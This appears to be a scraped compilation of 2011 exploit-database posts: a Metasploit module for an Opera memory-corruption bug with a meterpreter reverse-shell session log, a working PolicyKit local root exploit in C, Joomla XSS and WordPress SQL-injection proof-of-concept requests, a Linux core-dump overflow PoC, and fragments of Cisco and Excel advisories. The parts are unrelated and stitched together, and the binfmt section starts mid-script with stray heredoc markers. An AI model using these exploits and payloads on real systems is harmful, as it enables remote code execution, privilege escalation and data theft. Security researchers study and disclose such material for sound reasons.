
################################################################### Exploit for Opera 10/11 (bad nesting with frameset tag) Memory Corruption
#
# Vulnerability:
#
# Discovered: 2010-08-18
# Patched: 2011-05-18
# Tested on: v10.xx (v10.00, v10.01, v10.10, v10.50, v10.51, v10.52, v10.53, v10.54, v10.6, v10.61, v10.62 and v10.63)
#                           v11.xx < v11.11 (v11.00, v11.01 and v11.10)
# Patched on: v11.11
#
# Exploit:
#
# Coded: 2010-09-23
# Last revision: 2011-09-30
#
# RCE on: v10.00, v10.50, v10.51, v10.52, v10.54, v10.60, v10.62, v11.00, v11.01 and v11.10*
# DoS on: v10.01, v10.10, v10.53, v10.61 and v10.63
#
# Notes:
#
#   1) DEP bypass: possible but unreliable.
#   2) Let me know if you improve this one ;)
#   3) Most of the time it won't work on the first attempt and needs crash-dialog interaction.
#
# Credits: Jose A. Vazquez of http://spa-s3c.blogspot.com
#
# Greets to: Ruben, Sinn3r, Metasploit Team, Corelan Team, etc
#
# Running against Opera v10.62…
#
#
#        =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
# + — –=[ 741 exploits - 378 auxiliary - 82 post
# + -- --=[ 228 payloads - 27 encoders - 8 nops
#        =[ svn r13801 updated 3 days ago (2011.09.27)
#
# msf > use windows/browser/opera_frameset_tag
# msf  exploit(opera_frameset_tag) > set payload windows/meterpreter/reverse_tcp
# payload => windows/meterpreter/reverse_tcp
# msf  exploit(opera_frameset_tag) > set LHOST 192.168.1.103
# LHOST => 192.168.1.103
# msf  exploit(opera_frameset_tag) > exploit
# [*] Exploit running as background job.
#
# [*] Started reverse handler on 192.168.1.103:4444
# msf  exploit(opera_frameset_tag) >
# [*] Using URL: http://0.0.0.0:8080/sUpFmezLW6jS
# [*]  Local IP: http://192.168.1.103:8080/sUpFmezLW6jS
# [*] Server started.
# [*] Sending Opera 10/11 (bad nesting with frameset tag) Memory Corruption to 192.168.1.104:1185 (target: Opera Browser (v10.6x – v11.xx) / Windows XP SP3 (DEP-default))
# [*] Sending stage 1 (Spraying the heap)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage 2 (Triggering the vulnerability)
# [*] Sending stage (752128 bytes) to 192.168.1.104
# [*] Meterpreter session 1 opened (192.168.1.103:4444 -> 192.168.1.104:1190) at 2011-09-30 19:23:28 +0200
# Interrupt: use the ‘exit’ command to quit
# msf  exploit(opera_frameset_tag) > sessions
#
# Active sessions
# ===============
#
#   Id  Type                   Information                              Connection
#   –  —-                   ———–                              ———-
#   1   meterpreter x86/win32  0XDE1-A39ED4C12xde1 @ 0XDE1-A39ED4C12  192.168.1.103:4444 -> 192.168.1.104:1190
#
# msf  exploit(opera_frameset_tag) > sessions -i 1
# [*] Starting interaction with 1…
#
# meterpreter > getuid
# Server username: 0XDE1-A39ED4C12xde1
# meterpreter > execute -f  calc.exe
# Process 1336 created.
# meterpreter > exit
# [*] Shutting down Meterpreter…
# msf  exploit(opera_frameset_tag) >
#
######################################################
 
require 'msf/core'
 
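class Metasploit3 < Msf::Exploit::Remote

    Rank = NormalRanking

    include Msf::Exploit::Remote::HttpServer::HTML

    # Module metadata. Quoting has been normalised to plain ASCII quotes (the
    # published copy used typographic quotes and "0×"/"–" glyphs, which Ruby
    # does not parse); names, references and target parameters are unchanged.
    def initialize(info = {})

        super(update_info(info,
            'Name'           => 'Opera 10/11 (bad nesting with frameset tag) Memory Corruption',
            'Description'    => %q{

                This module exploits a vulnerability in the nesting of frameset and iframe tags as implemented within
                Opera Browser. A memory corruption is triggered and some pointers got corrupted with invalid addresses.
                Successfully exploiting leads to remote code execution or denial of service condition under Windows XP
                SP3 (DEP = off).

                Note than most of cases, it won’t work at first attempt and need crash-dialog interaction.
                Read the last reference for further details.

            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'Jose A. Vazquez'
                ],
            'Version'        => '$Revision: 0011 $',
            'References'     =>
                [
                    ['CVE', '2011-2628'],
                    ['OSVDB', '72406'],
                    ['BID', '47906'],
                    ['URL', 'http://www.beyondsecurity.com/ssd.html'],
                    ['URL', 'http://spa-s3c.blogspot.com/2011/09/spas3c-sv-004reliability-tests-ssd.html']
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC'          => 'process',
                    'HTTP::compression' => 'gzip',
                    'HTTP::chunked'     => true
                },
            'Payload'        =>
                {
                    'Space'    => 1000,
                    'BadChars' => "\x00",
                    'Compat'   =>
                        {
                            'ConnectionType' => '-find',
                        },
                    'StackAdjustment' => -3500
                },
            'Platform'       => 'win',
            # Target indices are relied on by automatic_target below:
            #   [0] Automatic, [1] v10.6x-v11.xx, [2] v10.50-v10.54, [3] v10.00-v10.10.
            # 'SizeofSpray' is the number of ~1 MB JavaScript strings allocated
            # by the spray loop; 'Ret' is the address the spray is expected to
            # cover (0x0c0c0c0c, also used as the NOP-like filler word).
            'Targets'        =>
                [
                    # Automatic
                    [ 'Automatic',
                        {}
                    ],

                    # Opera > v10.54 ~ author's estimate: spray of 350 MB
                    [ 'Opera Browser (v10.6x - v11.xx) / Windows XP SP3 (DEP-default)',
                        {
                            'SizeofSpray' => 700,
                            'Ret' => 0x0c0c0c0c
                        }
                    ],

                    # Opera <= v10.54 ~ author's estimate: spray of 250 MB
                    [ 'Opera Browser (v10.50 - v10.54) / Windows XP SP3 (DEP-default)',
                        {
                            'SizeofSpray' => 500,
                            'Ret' => 0x0c0c0c0c
                        }
                    ],

                    # Opera < v10.50 does not crash with the two-stage method and needs the single-page variant.
                    [ 'Opera Browser (v10.00 - v10.10) / Windows XP SP3 (DEP-default)',
                        {
                            'SizeofSpray' => 500,
                            'Ret' => 0x0c0c0c0c
                        }
                    ]
                ],
            'DisclosureDate' => '5 October 2011',
            'DefaultTarget'  => 0))

    end

    # Picks a target from the Opera "Version/x.yy" token of the User-Agent
    # header (the author's own auto-targeting rather than BrowserAutopwn).
    #
    # cli     - the client connection (unused, kept for interface parity)
    # request - the HTTP request whose User-Agent is inspected
    #
    # Returns one of the non-automatic entries of `targets`.
    #
    # NOTE(review): an absent or non-Opera User-Agent also falls through to
    # targets[1]; nothing here verifies that the client is Opera at all.
    def automatic_target(cli, request)

        agent = request.headers['User-Agent'].to_s

        case agent
        when /Version\/10\.(00|01|10)/
            targets[3]
        when /Version\/10\.5[0-4]/
            targets[2]
        else
            targets[1]
        end

    end

    # Serves the exploit pages.
    #
    # Two-stage flow (targets > v10.10): the first request gets a text/html
    # page that sprays the heap and, after a 2-4 s timer, document.writes an
    # <iframe> pointing at "<resource>/<random>.xhtml"; that second request is
    # answered with the XHTML trigger document. Targets v10.00-v10.10 get a
    # single XHTML page that both triggers and sprays, reloading every 500 ms.
    #
    # The payload is regenerated per client and emitted as a %u-escaped
    # JavaScript string; JavaScript identifiers are randomised per request.
    #
    # NOTE(review): every request to the resource URL is served the exploit;
    # there is no per-client gating beyond the User-Agent based target choice.
    def on_request_uri(cli, request)

        mytarget = (target.name == 'Automatic') ? automatic_target(cli, request) : target

        if request.uri =~ /\.xhtml$/

            # Stage 2: the XHTML trigger document (targets > v10.10).
            # The misnested <xht:frameset>/<xht:iframe> is the vulnerability trigger.

            html = %Q|
                    <html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
                    <meta http-equiv="refresh" content="0;url=" />
                        <xht:frameset>
                            <xht:iframe>
                                <xht:script>
                                rbc
                                </xht:script>
                                <style type="text/css">
                                    <!-- /* padding CSS */

                                    approx:root{
                                        font: 333em;
                                    }
                                    -->
                                </style>
                            </xht:iframe>
                        </xht:frameset>
                    </html>
                |

            print_status("Sending stage 2 (Triggering the vulnerability)")

            var_contentype = 'application/xhtml+xml'

        else

            # Stage 1: heap spray plus (for > v10.10) a hidden iframe that
            # fetches the trigger; for v10.00-v10.10 trigger and spray share one page.

            # Regenerate the payload for this client; bail out if that fails.
            return if regenerate_payload(cli).nil?

            # %u-escaped shellcode in the target's byte order.
            shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(mytarget.arch))

            # Low 16 bits of the return address as a %u word (0x0c0c0c0c -> "0c0c").
            addr_word  = [mytarget.ret].pack('V').unpack('H*')[0][0,4]

            # Randomised JavaScript identifiers (per request).

            var_buffer      =   rand_text_alpha(rand(30)+2)
            var_shellcode   =   rand_text_alpha(rand(30)+2)
            var_unescape    =   rand_text_alpha(rand(30)+2)
            var_x           =   rand_text_alpha(rand(30)+2)
            var_i           =   rand_text_alpha(rand(30)+2)

            var_size        =   rand_text_alpha(rand(30)+2)
            var_nopsize     =   rand_text_alpha(rand(30)+2)
            var_limit       =   rand_text_alpha(rand(30)+2)

            var_function_trigger    =   rand_text_alpha(rand(30)+2)
            var_file_trigger    =   rand_text_alpha(rand(30)+2)

            # Delay (ms) before the trigger iframe is written: 2000-4000 ms.
            var_timer_trigger = (rand(3) + 2) * 1000

            # Absolute URL of this resource, as seen by the client. When bound
            # to 0.0.0.0 the address routable to the peer is used instead.
            # SRVPORT is interpolated so this works whether the datastore holds
            # it as a String or an Integer.

            var_url =  ((datastore['SSL']) ? "https://" : "http://")
            var_url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'])
            var_url << ":#{datastore['SRVPORT']}"
            var_url << get_resource

            print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport} (target: #{mytarget.name})")

            if mytarget.name =~ /v10\.00/

            # Case v10.00 - v10.10: single XHTML page, trigger first, then spray.
            # NOTE(review): the document ends with a second "<html>" rather than
            # "</html>", exactly as published; left unchanged because the
            # exploit's behaviour may depend on the ill-formed document.

                html = %Q|
                    <html xmlns="http://www.w3.org/1999/xhtml" xmlns:xht="http://www.w3.org/1999/xhtml">
                        <xht:frameset>
                            <xht:iframe>
                                <xht:script>
                                    aaaaaa
                                </xht:script>
                            </xht:iframe>
                        </xht:frameset>
                        <script type="text/javascript">
                            <![CDATA[
                                var #{var_unescape}  = unescape;
                                var #{var_shellcode} = #{var_unescape}("#{shellcode}");

                                var #{var_size} = #{var_shellcode}.length * 2;
                                var #{var_nopsize} = 0x100000 - (#{var_size} + 0x14);
                                var #{var_buffer} = #{var_unescape}("%u#{addr_word}");

                                while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
                                    #{var_buffer} += #{var_buffer};
                                }

                                var #{var_x} = new Array();

                                for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
                                    #{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
                                }
                                setInterval("location.reload()", 500);
                            ]]>
                        </script>
                    <html>
                    |

                print_status("Sending simple stage (Sprayer and Triggerer)")
                var_contentype = 'application/xhtml+xml'

            else

            # Case > v10.10: spray now, write the trigger iframe after the timer.
            # (Trailing "<html>" kept as published; see note above.)

                html = %Q|
                        <html>
                            <head>
                                <script type="text/javascript">
                                    var #{var_unescape}  = unescape;
                                    var #{var_shellcode} = #{var_unescape}("#{shellcode}");

                                    var #{var_size} = #{var_shellcode}.length * 2;
                                    var #{var_nopsize} = 0x100000 - (#{var_size} + 0x14);
                                    var #{var_buffer} = #{var_unescape}("%u#{addr_word}");

                                    while ( #{var_buffer}.length * 2 < #{var_nopsize} ) {
                                        #{var_buffer} += #{var_buffer};
                                    }

                                    var #{var_x} = new Array();

                                    for ( var #{var_i} =0; #{var_i} < #{mytarget['SizeofSpray']}; #{var_i}++ ) {
                                        #{var_x}[ #{var_i} ] = #{var_buffer} + #{var_shellcode};
                                    }

                                    function #{var_function_trigger}(){
                                        document.write("<iframe src='#{var_url}/#{var_file_trigger}.xhtml'></iframe>");
                                    }

                                    setTimeout('#{var_function_trigger}()',#{var_timer_trigger});

                                </script>
                            </head>
                        <html>
                    |

                print_status("Sending stage 1 (Spraying the heap)")
                var_contentype = 'text/html'

            end

        end

        # Send the page uncached, then hand the connection to the payload handler.
        send_response(cli, html, { 'Content-Type' => var_contentype, 'Pragma' => 'no-cache' })
        handler(cli)

    end

end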


/* polkit-pwnage.c
*
*
* ==============================
* =      PolicyKit Pwnage      =
* =          by zx2c4          =
* =        Sept 2, 2011        =
* ==============================
*
*
* Howdy folks,
*
* This exploits CVE-2011-1485, a race condition in PolicyKit.
*
* davidz25 explains:
*
* –begin–
* Briefly, the problem is that the UID for the parent process of pkexec(1) is
* read from /proc by stat(2)’ing /proc/PID. The problem with this is that
* this returns the effective uid of the process which can easily be set to 0
* by invoking a setuid-root binary such as /usr/bin/chsh in the parent
* process of pkexec(1). Instead we are really interested in the real-user-id.
* While there’s a check in pkexec.c to avoid this problem (by comparing it to
* what we expect the uid to be – namely that of the pkexec.c process itself which
* is the uid of the parent process at pkexec-spawn-time), there is still a short
* window where an attacker can fool pkexec/polkitd into thinking that the parent
* process has uid 0 and is therefore authorized. It’s pretty hard to hit this
* window – I actually don’t know if it can be made to work in practice.
* –end–
*
* Well, here is, in fact, how it’s made to work in practice. There is as he said an
* attempted mitigation, and the way to trigger that mitigation path is something
* like this:
*
*     $ sudo -u `whoami` pkexec sh
*     User of caller (0) does not match our uid (1000)
*
* Not what we want. So the trick is to execl to a suid at just the precise moment
* /proc/PID is being stat(2)’d. We use inotify to learn exactly when it’s accessed,
* and execl to the suid binary as our very next instruction.
*
* ** Usage **
* $ pkexec --version
* pkexec version 0.101
* $ gcc polkit-pwnage.c -o pwnit
* $ ./pwnit
* [+] Configuring inotify for proper pid.
* [+] Launching pkexec.
* sh-4.2# whoami
* root
* sh-4.2# id
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* sh-4.2#
*
* ** Targets **
* This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which
* as of writing uses 0.101, has backported 0.102's bug fix. A way to check
* this is by looking at the mtime of /usr/bin/pkexec — April 22, 2011 or
* later and you’re out of luck. It’s likely other distributions do the same.
* Fortunately, this exploit is clean enough that you can try it out without
* too much collateral.
*
*
* greets to djrbliss and davidz25.
*
* – zx2c4
* 2-sept-2011
*
*/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/inotify.h>
 
int main(int argc, char **argv)
{
    printf("=============================\n");
    printf("=      PolicyKit Pwnage     =\n");
    printf("=          by zx2c4         =\n");
    printf("=        Sept 2, 2011       =\n");
    printf("=============================\n\n");

    /* Parent: the process pkexec will inspect as its parent.  NOTE(review):
     * fork() returning -1 on failure is also non-zero, so this branch then
     * runs with no child ever started. */
    if (fork()) {
        int fd;
        char pid_path[1024];
        sprintf(pid_path, "/proc/%i", getpid());
        printf("[+] Configuring inotify for proper pid.\n");
        /* Drop stdin/stdout/stderr before exec'ing chsh (presumably so it
         * cannot interact with the terminal); note this also silences the
         * perror() below. */
        close(0); close(1); close(2);
        fd = inotify_init();
        if (fd < 0)
            perror("[-] inotify_init");
        /* Watch our own /proc/PID entry so we wake up the moment pkexec
         * looks at it (the header comment describes the race). Return value
         * is not checked. */
        inotify_add_watch(fd, pid_path, IN_ACCESS);
        /* Zero-length read, used purely as a blocking wake-up on the watch;
         * the event data is never needed.  TODO(review): confirm on the
         * target kernel that this blocks until an event is queued rather
         * than returning immediately. */
        read(fd, NULL, 0);
        /* Next instruction after the wake-up: become a setuid-root process
         * so /proc/PID reports an effective uid of 0 inside the window. */
        execl("/usr/bin/chsh", "chsh", NULL);
    } else {
        /* Child: give the parent a second to arm the watch, then launch
         * pkexec; its parent is the process about to exec chsh. */
        sleep(1);
        printf("[+] Launching pkexec.\n");
        execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
    }
    return 0;
}


Modify nginx config file

location ~ \.php($|/) {
# Matches "/foo.php" and "/foo.php/extra/path" (PATH_INFO-style URLs).
root /var/www/html;
# Hand the request to the local PHP-FPM listener.
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /var/www/html$fastcgi_script_name;
# Split "/index.php/controller/method" into the script name (first capture,
# becomes $fastcgi_script_name) and the trailing path ($fastcgi_path_info).
fastcgi_split_path_info ^(.+\.php)(.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
include fastcgi_params;
# NOTE(review): any URI containing ".php" followed by "/" or end-of-string
# reaches PHP-FPM, including e.g. "/uploads/image.jpg/x.php". If PHP runs
# with cgi.fix_pathinfo=1 (historically the default) and the named script
# does not exist, PHP may execute the preceding path component instead.
# Set cgi.fix_pathinfo=0 in php.ini (PATH_INFO is passed explicitly above)
# or check that the script file exists before passing -- confirm against
# your PHP build.
}

Modify codeigniter config

Before:
//$config['uri_protocol']       = "AUTO";
After:
$config['uri_protocol'] = "PATH_INFO";

Advisory ID: cisco-sa-20110928-ipv6
http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6.shtml

Revision 1.1

Last Updated 2011 September 30 2330 UTC (GMT)
For Public Release 2011 September 28 1600 UTC (GMT)

Contents

Summary
Affected Products
Details
Vulnerability Scoring Details
Impact
Software Versions and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures


Summary

Cisco IOS Software contains a vulnerability in the IP version 6 (IPv6) protocol stack implementation that could allow an unauthenticated, remote attacker to cause a reload of an affected device that has IPv6 enabled. The vulnerability may be triggered when the device processes a malformed IPv6 packet.

Cisco has released free software updates that address this vulnerability. There are no workarounds to mitigate this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6.shtml.

Note: The September 28, 2011, Cisco IOS Software Security Advisory bundled publication includes ten Cisco Security Advisories. Nine of the advisories address vulnerabilities in Cisco IOS Software, and one advisory addresses a vulnerability in Cisco Unified Communications Manager. Each advisory lists the Cisco IOS Software releases that correct the vulnerability or vulnerabilities detailed in the advisory as well as the Cisco IOS Software releases that correct all vulnerabilities in the September 2011 Bundled Publication.

Individual publication links are in "Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication" at the following link:

http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_sep11.html

Reference:
 http://www.cisco.com/en/US/products/products_security_advisory09186a0080b95d59.shtml


1. OVERVIEW

Joomla! 1.7.0 (stable version) is vulnerable to multiple Cross Site
Scripting issues.

2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.

3. VULNERABILITY DESCRIPTION

Several parameters (searchword, extension, asset, author ) in Joomla!
Core components are not properly sanitized upon submission to the
/index.php url, which allows attacker to conduct Cross Site Scripting
attack. This may allow an attacker to create a specially crafted URL
that would execute arbitrary script code in a victim’s browser.

4. VERSION AFFECTED

Joomla! 1.7.0 and earlier (fixed in 1.7.1-stable)

5. PROOF-OF-CONCEPT/EXPLOIT

component: com_search, parameter: searchword (Browser: IE, Konqueror)
==========================================================

[REQUEST]
POST /joomla17_noseo/index.php HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: MSIE 8.0
Connection: close
Referer: http://localhost/joomla17_noseo
Content-Type: application/x-www-form-urlencoded
Content-Length: 456

task=search&Itemid=435&searchword=Search’;onunload=function(){x=confirm(String.fromCharCode(89,111,117,39,118,101,32,103,111,116,32,97,32,109,101,115,115,97,103,101,32,102,114,
111,109,32,65,100,109,105,110,105,115,116,114,97,116,111,114,33,10,68,111,32,121,111
,117,32,119,97,110,116,32,116,111,32,103,111,32,116,111,32,73,110,98,111,120,63));
alert(String.fromCharCod(89,111,117,39,118,101,32,103,111,116,32,88,83,83,33));};
//xsssssssssss&option=com_search
[/REQUEST]

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

An authenticated back-end (/administrator/) login is required to exploit the following XSS vectors.

Parameter: extension, Component: com_categories
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_categories&extension=com_content%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

Parameter: asset , Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22&author=

Parameter: author, Component: com_media
====================================================

http://localhost/joomla17_noseo/administrator/index.php?option=com_media&view=images&tmpl=component&e_name=jform_articletext&asset=
&author=1%22%20onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22x=%22

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

6. IMPACT

Attackers can compromise currently logged-in user/administrator
session and impersonate arbitrary user actions available under
/administrator/ functions.

7. SOLUTION

Upgrade to Joomla! 1.7.1-stable or higher.

8. VENDOR

Joomla! Developer Team
http://www.joomla.org

9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.

10. DISCLOSURE TIME-LINE

2011-07-29: notified vendor
2011-09-26: patched version, 1.7.1-stable, released
2011-09-29: vulnerability disclosed

11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.7.0-stable%5D_cross_site_scripting%28XSS%29
Vendor Advisory URLs:
http://developer.joomla.org/security/news/367-20110901-core-xss-vulnerability
http://developer.joomla.org/security/news/368-20110902-core-xss-vulnerability


# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)
 
—————
PoC (POST data)
—————
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 
—————
Vulnerable code
—————
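// Vulnerable excerpt from wp-bannerize/ajax_sorter.php (kept as published,
// annotated). The only gate is the presence of an X-Requested-With header,
// which the client controls (see the curl PoC above); there is no nonce or
// capability check visible here.
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    …
    $limit = intval($_POST['limit']);
    // "-" restored here: the published copy rendered it as an en-dash.
    $page_offset = (intval($_POST['offset']) - 1) * $limit;

    foreach($_POST["item"] as $key => $value){
        // $key is cast with intval(), but $value is interpolated into the
        // WHERE clause unquoted and unescaped -> SQL injection (CWE-89).
        // Fix: build the statement with a placeholder instead of sprintf(), e.g.
        //   $wpdb->query( $wpdb->prepare( "UPDATE `{$wpdb->prefix}bannerize_b` SET `sorter` = %d WHERE id = %d",
        //                                 intval($key) + $page_offset, $value ) );
        $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
        $result = mysql_query($sql);
    }
}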


/*
* Linux binfmt_elf core dump buffer overflow
*
* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
// phase 1
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>

#include <sys/time.h>
#include <sys/resource.h>

#include <asm/page.h>

static char *env[10], *argv[4];
static char page[PAGE_SIZE];
static char buf[PAGE_SIZE];

/* Print a fatal error and terminate with status 129 without running
 * atexit handlers.  With errno clear there is nothing for perror() to add,
 * so the message is printed verbatim on stderr; otherwise perror() appends
 * the errno description.  Both streams are flushed before _exit(). */
void fatal(const char *msg)
{
	if (errno) {
		printf("\n");
		perror(msg);
	} else {
		fprintf(stderr, "\nFATAL: %s\n", msg);
	}
	fflush(stdout);
	fflush(stderr);
	_exit(129);
}

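/* Phase 1 / phase 2 driver for the binfmt_elf core-dump overflow PoC.
 *
 * First run (phase 1): fill nine environment slots with a page of 'A's,
 * set argv[0] to "AAAA" and re-exec ourselves.  Second run (phase 2,
 * detected by argv[0] == "AAAA"): exec the "elfcd2" helper with a
 * page-sized argv[1] and a 793-byte argv[2] of 'C's, with the core size
 * limit raised to unlimited so the helper's crash actually produces a dump.
 *
 * Fixes versus the published copy: the asm capturing ESP used an input
 * constraint ("m") although it writes esp -- it is now an output ("=m");
 * the typographic quotes around 'A' and 'C' are plain again; an execve()
 * failure is reported instead of silently returning 0.  i386 only.
 */
int main(int ac, char **av)
{
	int esp, i, r;
	struct rlimit rl;

	if (ac < 1 || av[0] == NULL)
		fatal("argv[0] missing");

	/* Capture ESP so both phases can print where the stack sits relative
	 * to the argv strings. */
	__asm__("movl %%esp, %0" : "=m"(esp));
	printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0],
	       av[ac-1]+strlen(av[ac-1]), esp);

	/* Unlimited core size: phase 2 relies on a core dump being written. */
	rl.rlim_cur = RLIM_INFINITY;
	rl.rlim_max = RLIM_INFINITY;
	r = setrlimit(RLIMIT_CORE, &rl);
	if (r) fatal("setrlimit");

	memset(env, 0, sizeof(env));
	memset(argv, 0, sizeof(argv));
	memset(page, 'A', sizeof(page));
	page[PAGE_SIZE-1] = 0;

	/* Phase 2: we were re-exec'd by phase 1 (argv[0] == "AAAA"). */
	if (!strcmp(av[0], "AAAA")) {
		printf("\n[+] phase 2, <RET> to crash "); fflush(stdout);
		argv[0] = "elfcd2";
		argv[1] = page;

		/* term 0 counts!  789 + 4 'C's followed by the terminator. */
		memset(buf, 0, sizeof(buf));
		for (i = 0; i < 789 + 4; i++)
			buf[i] = 'C';
		argv[2] = buf;
		execve(argv[0], argv, env);
		/* only reached when execve() failed */
		perror("[-] execve elfcd2");
		_exit(127);
	}

	/* Phase 1: nine page-sized env strings, then re-exec ourselves. */
	for (i = 0; i < 9; i++)
		env[i] = page;

	argv[0] = "AAAA";
	printf("\n[+] phase 1"); fflush(stdout);
	execve(av[0], argv, env);
	/* only reached when execve() failed; previously fell through to return 0 */
	fatal("execve");

	return 0;
}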
__EOF__
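cat <<__EOF__>elfcd2.c
// phase 2: helper exec'd by elfcd with a page-sized argv[1] and a 793-byte
// argv[2]; it switches to a fixed stack address and then waits to be told
// to crash.  Linked with the custom linker script written below.
// Fix versus the published copy: the 'a' initialiser in killme() had been
// turned into a typographic quote, which does not compile.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <syscall.h>

#include <sys/syscall.h>

#include <asm/page.h>

#define __NR_sys_read __NR_read
#define __NR_sys_kill __NR_kill
#define __NR_sys_getpid __NR_getpid

// Present in the original; not referenced by the code shown here.
char stack[4096 * 6];
static int errno;

// Raw syscall stubs built with the (legacy, glibc-2.3 era) _syscallN macros.
inline _syscall3(int, sys_read, int, a, void*, b, int, l);
inline _syscall2(int, sys_kill, int, c, int, a);
inline _syscall0(int, sys_getpid);

// yeah, lets do it
// Block on one byte from stdin, then send ourselves SIGSEGV (signal 11);
// with RLIMIT_CORE raised by phase 1 the kernel writes a core dump.  Loops
// so the crash can be retried on each keypress.
void killme()
{
	char c = 'a';
	int pid;

	pid = sys_getpid();
	for (;;) {
		sys_read(0, &c, 1);
		sys_kill(pid, 11);
	}
}

// safe stack stub: entry point moves ESP to a fixed address before calling
// killme.  The dollar sign is backslash-escaped because this is an unquoted
// shell heredoc.
__asm__(
" nop \n"
"_start: movl \$0xbfff6ffc, %esp \n"
" jmp killme \n"
".global _start \n"
);
__EOF__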
cat <<__EOF__>elfcd.ld
OUTPUT_FORMAT("elf32-i386", "elf32-i386",
"elf32-i386")
OUTPUT_ARCH(i386)
ENTRY(_start)
SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib);
SEARCH_DIR(/usr/i486-suse-linux/lib);

MEMORY
{
ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0×8000
rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0×10000
}

PHDRS
{
headers PT_PHDR PHDRS ;
text PT_LOAD FILEHDR PHDRS ;
fuckme PT_LOAD AT (0xbfff8000) FLAGS (0×00) ;
}

SECTIONS
{

.dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0×7000; } >rom :fuckme

. = 0xbfff0000 + SIZEOF_HEADERS;
.text : { *(.text) } >ram :text
.data : { *(.data) } >ram :text
.bss :
{
*(.dynbss)
*(.bss)
*(.bss.*)
*(.gnu.linkonce.b.*)
*(COMMON)
. = ALIGN(32 / 8);
} >ram :text

}

I. BACKGROUND

Excel is the spreadsheet application included with Microsoft Corp.’s Office productivity software suite. More information is available at the following website:

http://office.microsoft.com/excel/

II. DESCRIPTION

Remote exploitation of an integer signedness vulnerability in Microsoft Corp.’s Excel could allow an attacker to execute arbitrary code with the privileges of the current user.

The vulnerability is an integer signedness issue that leads to an invalid array indexing vulnerability. It is triggered by a certain record with a negative ‘iax’ field.

